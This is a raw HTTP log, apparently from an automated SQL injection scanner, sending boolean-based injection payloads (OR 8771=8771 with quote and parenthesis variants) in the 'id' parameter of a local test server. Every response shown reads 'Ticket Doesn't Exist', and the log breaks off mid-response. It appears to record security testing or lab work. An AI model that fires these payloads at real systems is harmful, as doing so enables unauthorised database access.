Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2139%27%20OR%208771%3D8771--%20vRdy

Ticket Doesn't Exist

############################################################################

HTTP request [#85]:
GET /?id=-9626%22%20OR%206060%3D3441--%20SATb HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#85] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9626%22%20OR%206060%3D3441--%20SATb

Ticket Doesn't Exist

############################################################################

HTTP request [#86]:
GET /?id=-1973%22%20OR%208771%3D8771--%20TvvH HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#86] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-1973%22%20OR%208771%3D8771--%20TvvH

Ticket Doesn't Exist

############################################################################

HTTP request [#87]:
GET /?id=-1511%27%29%20OR%203047%3D7871%20AND%20%28%27Lwob%27%3D%27Lwob HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#87] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-1511%27%29%20OR%203047%3D7871%20AND%20%28%27Lwob%27%3D%27Lwob

Ticket Doesn't Exist

############################################################################

HTTP request [#88]:
GET /?id=-4569%27%29%20OR%208771%3D8771%20AND%20%28%27vTIv%27%3D%27vTIv HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#88] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4569%27%29%20OR%208771%3D8771%20AND%20%28%27vTIv%27%3D%27vTIv

Ticket Doesn't Exist

############################################################################

HTTP request [#89]:
GET /?id=-6847%27%29%29%20OR%203790%3D3170%20AND%20%28%28%27DuqX%27%3D%27DuqX HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#89] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-6847%27%29%29%20OR%203790%3D3170%20AND%20%28%28%27DuqX%27%3D%27DuqX

Ticket Doesn't Exist

############################################################################

HTTP request [#90]:
GET /?id=-2878%27%29%29%20OR%208771%3D8771%20AND%20%28%28%27emqp%27%3D%27emqp HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#90] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2878%27%29%29%20OR%208771%3D8771%20AND%20%28%28%27emqp%27%3D%27emqp

Ticket Doesn't Exist

############################################################################

HTTP request [#91]:
GET /?id=-4143%27%29%29%29%20OR%208619%3D3305%20AND%20%28%28%28%27DxhF%27%3D%27DxhF HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#91] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4143%27%29%29%29%20OR%208619%3D3305%20AND%20%28%28%28%27DxhF%27%3D%27DxhF

Ticket Doesn't Exist

############################################################################

HTTP request [#92]:
GET /?id=-7368%27%29%29%29%20OR%208771%3D8771%20AND%20%28%28%28%27dpYc%27%3D%27dpYc HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#92] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-7368%27%29%29%29%20OR%208771%3D8771%20AND%20%28%28%28%27dpYc%27%3D%27dpYc

Ticket Doesn't Exist

############################################################################

HTTP request [#93]:
GET /?id=-8020%27%20OR%205565%3D6967%20AND%20%27RCre%27%3D%27RCre HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#93] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-8020%27%20OR%205565%3D6967%20AND%20%27RCre%27%3D%27RCre

Ticket Doesn't Exist

############################################################################

HTTP request [#94]:
GET /?id=-1688%27%20OR%208771%3D8771%20AND%20%27VTSl%27%3D%27VTSl HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#94] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-1688%27%20OR%208771%3D8771%20AND%20%27VTSl%27%3D%27VTSl

Ticket Doesn't Exist

############################################################################

HTTP request [#95]:
GET /?id=-4432%27%29%20OR%208369%3D2175%20AND%20%28%27ywMI%27%20LIKE%20%27ywMI HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#95] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4432%27%29%20OR%208369%3D2175%20AND%20%28%27ywMI%27%20LIKE%20%27ywMI

Ticket Doesn't Exist

############################################################################

HTTP request [#96]:
GET /?id=-3834%27%29%20OR%208771%3D8771%20AND%20%28%27omUg%27%20LIKE%20%27omUg HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#96] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-3834%27%29%20OR%208771%3D8771%20AND%20%28%27omUg%27%20LIKE%20%27omUg

Ticket Doesn't Exist

############################################################################

HTTP request [#97]:
GET /?id=-4047%27%29%29%20OR%203545%3D2546%20AND%20%28%28%27zhJs%27%20LIKE%20%27zhJs HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#97] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4047%27%29%29%20OR%203545%3D2546%20AND%20%28%28%27zhJs%27%20LIKE%20%27zhJs

Ticket Doesn't Exist

############################################################################

HTTP request [#98]:
GET /?id=-4889%27%29%29%20OR%208771%3D8771%20AND%20%28%28%27Dbrv%27%20LIKE%20%27Dbrv HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#98] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4889%27%29%29%20OR%208771%3D8771%20AND%20%28%28%27Dbrv%27%20LIKE%20%27Dbrv

Ticket Doesn't Exist

############################################################################

HTTP request [#99]:
GET /?id=-9872%27%29%29%29%20OR%207879%3D3242%20AND%20%28%28%28%27cEfk%27%20LIKE%20%27cEfk HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#99] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9872%27%29%29%29%20OR%207879%3D3242%20AND%20%28%28%28%27cEfk%27%20LIKE%20%27cEfk

Ticket Doesn't Exist

############################################################################

HTTP request [#100]:
GET /?id=-5760%27%29%29%29%20OR%208771%3D8771%20AND%20%28%28%28%27rvfT%27%20LIKE%20%27rvfT HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#100] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-5760%27%29%29%29%20OR%208771%3D8771%20AND%20%28%28%28%27rvfT%27%20LIKE%20%27rvfT

Ticket Doesn't Exist

############################################################################

HTTP request [#101]:
GET /?id=-1041%25%27%20OR%202725%3D6566%20AND%20%27BPAe%25%27%3D%27BPAe HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#101] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-1041%25%27%20OR%202725%3D6566%20AND%20%27BPAe%25%27%3D%27BPAe

Ticket Doesn't Exist

############################################################################

HTTP request [#102]:
GET /?id=-7723%25%27%20OR%208771%3D8771%20AND%20%27wOep%25%27%3D%27wOep HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#102] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-7723%25%27%20OR%208771%3D8771%20AND%20%27wOep%25%27%3D%27wOep

Ticket Doesn't Exist

############################################################################

HTTP request [#103]:
GET /?id=-9490%27%20OR%202345%3D3816%20AND%20%27Byin%27%20LIKE%20%27Byin HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#103] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9490%27%20OR%202345%3D3816%20AND%20%27Byin%27%20LIKE%20%27Byin

Ticket Doesn't Exist

############################################################################

HTTP request [#104]:
GET /?id=-7559%27%20OR%208771%3D8771%20AND%20%27rlQp%27%20LIKE%20%27rlQp HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#104] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-7559%27%20OR%208771%3D8771%20AND%20%27rlQp%27%20LIKE%20%27rlQp

Ticket Doesn't Exist

############################################################################

HTTP request [#105]:
GET /?id=-6368%22%29%20OR%205916%3D1287%20AND%20%28%22Tohr%22%3D%22Tohr HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#105] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-6368%22%29%20OR%205916%3D1287%20AND%20%28%22Tohr%22%3D%22Tohr

Ticket Doesn't Exist

############################################################################

HTTP request [#106]:
GET /?id=-9002%22%29%20OR%208771%3D8771%20AND%20%28%22zgZn%22%3D%22zgZn HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#106] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9002%22%29%20OR%208771%3D8771%20AND%20%28%22zgZn%22%3D%22zgZn

Ticket Doesn't Exist

############################################################################

HTTP request [#107]:
GET /?id=-4826%22%29%29%20OR%201180%3D9399%20AND%20%28%28%22VBYI%22%3D%22VBYI HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#107] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4826%22%29%29%20OR%201180%3D9399%20AND%20%28%28%22VBYI%22%3D%22VBYI

Ticket Doesn't Exist

############################################################################

HTTP request [#108]:
GET /?id=-7106%22%29%29%20OR%208771%3D8771%20AND%20%28%28%22EMCW%22%3D%22EMCW HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#108] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:52 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-7106%22%29%29%20OR%208771%3D8771%20AND%20%28%28%22EMCW%22%3D%22EMCW

Ticket Doesn't Exist

############################################################################

HTTP request [#109]:
GET /?id=-1105%22%29%29%29%20OR%201848%3D6261%20AND%20%28%28%28%22TsYy%22%3D%22TsYy HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#109] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-1105%22%29%29%29%20OR%201848%3D6261%20AND%20%28%28%28%22TsYy%22%3D%22TsYy

Ticket Doesn't Exist

############################################################################

HTTP request [#110]:
GET /?id=-6236%22%29%29%29%20OR%208771%3D8771%20AND%20%28%28%28%22ihri%22%3D%22ihri HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#110] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-6236%22%29%29%29%20OR%208771%3D8771%20AND%20%28%28%28%22ihri%22%3D%22ihri

Ticket Doesn't Exist

############################################################################

HTTP request [#111]:
GET /?id=-5886%22%20OR%208792%3D4118%20AND%20%22mhmG%22%3D%22mhmG HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#111] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-5886%22%20OR%208792%3D4118%20AND%20%22mhmG%22%3D%22mhmG

Ticket Doesn't Exist

############################################################################

HTTP request [#112]:
GET /?id=-4747%22%20OR%208771%3D8771%20AND%20%22BzNk%22%3D%22BzNk HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#112] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4747%22%20OR%208771%3D8771%20AND%20%22BzNk%22%3D%22BzNk

Ticket Doesn't Exist

############################################################################

HTTP request [#113]:
GET /?id=-6757%22%29%20OR%206667%3D2989%20AND%20%28%22YYiZ%22%20LIKE%20%22YYiZ HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#113] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-6757%22%29%20OR%206667%3D2989%20AND%20%28%22YYiZ%22%20LIKE%20%22YYiZ

Ticket Doesn't Exist

############################################################################

HTTP request [#114]:
GET /?id=-2918%22%29%20OR%208771%3D8771%20AND%20%28%22MVvR%22%20LIKE%20%22MVvR HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#114] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2918%22%29%20OR%208771%3D8771%20AND%20%28%22MVvR%22%20LIKE%20%22MVvR

Ticket Doesn't Exist

############################################################################

HTTP request [#115]:
GET /?id=-5377%22%29%29%20OR%207293%3D5579%20AND%20%28%28%22hDzp%22%20LIKE%20%22hDzp HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#115] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-5377%22%29%29%20OR%207293%3D5579%20AND%20%28%28%22hDzp%22%20LIKE%20%22hDzp

Ticket Doesn't Exist

############################################################################

HTTP request [#116]:
GET /?id=-3487%22%29%29%20OR%208771%3D8771%20AND%20%28%28%22uvpW%22%20LIKE%20%22uvpW HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#116] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-3487%22%29%29%20OR%208771%3D8771%20AND%20%28%28%22uvpW%22%20LIKE%20%22uvpW

Ticket Doesn't Exist

############################################################################

HTTP request [#117]:
GET /?id=-2900%22%29%29%29%20OR%209647%3D4975%20AND%20%28%28%28%22UjTR%22%20LIKE%20%22UjTR HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#117] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2900%22%29%29%29%20OR%209647%3D4975%20AND%20%28%28%28%22UjTR%22%20LIKE%20%22UjTR

Ticket Doesn't Exist

############################################################################

HTTP request [#118]:
GET /?id=-8610%22%29%29%29%20OR%208771%3D8771%20AND%20%28%28%28%22Ycxj%22%20LIKE%20%22Ycxj HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#118] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-8610%22%29%29%29%20OR%208771%3D8771%20AND%20%28%28%28%22Ycxj%22%20LIKE%20%22Ycxj

Ticket Doesn't Exist

############################################################################

HTTP request [#119]:
GET /?id=-7128%22%20OR%205684%3D1739%20AND%20%22MTNc%22%20LIKE%20%22MTNc HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#119] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-7128%22%20OR%205684%3D1739%20AND%20%22MTNc%22%20LIKE%20%22MTNc

Ticket Doesn't Exist

############################################################################

HTTP request [#120]:
GET /?id=-9394%22%20OR%208771%3D8771%20AND%20%22iZiS%22%20LIKE%20%22iZiS HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#120] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9394%22%20OR%208771%3D8771%20AND%20%22iZiS%22%20LIKE%20%22iZiS

Ticket Doesn't Exist

############################################################################

HTTP request [#121]:
GET /?id=-8623%27%20OR%206419%3D7222%20OR%20%27DzFv%27%3D%27pVCP HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#121] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-8623%27%20OR%206419%3D7222%20OR%20%27DzFv%27%3D%27pVCP

Ticket Doesn't Exist

############################################################################

HTTP request [#122]:
GET /?id=-5835%27%20OR%208771%3D8771%20OR%20%27ywqq%27%3D%27hYXu HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#122] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:53 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-5835%27%20OR%208771%3D8771%20OR%20%27ywqq%27%3D%27hYXu

Ticket Doesn't Exist

############################################################################

HTTP request [#123]:
GET /?id=-6080%27%29%20WHERE%208526%3D8526%20OR%209199%3D7571--%20sBbF HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#123] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:54 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-6080%27%29%20WHERE%208526%3D8526%20OR%209199%3D7571--%20sBbF

Ticket Doesn't Exist

############################################################################

HTTP request [#124]:
GET /?id=-8785%27%29%20WHERE%208324%3D8324%20OR%208771%3D8771--%20cVAu HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#124] (200 OK):
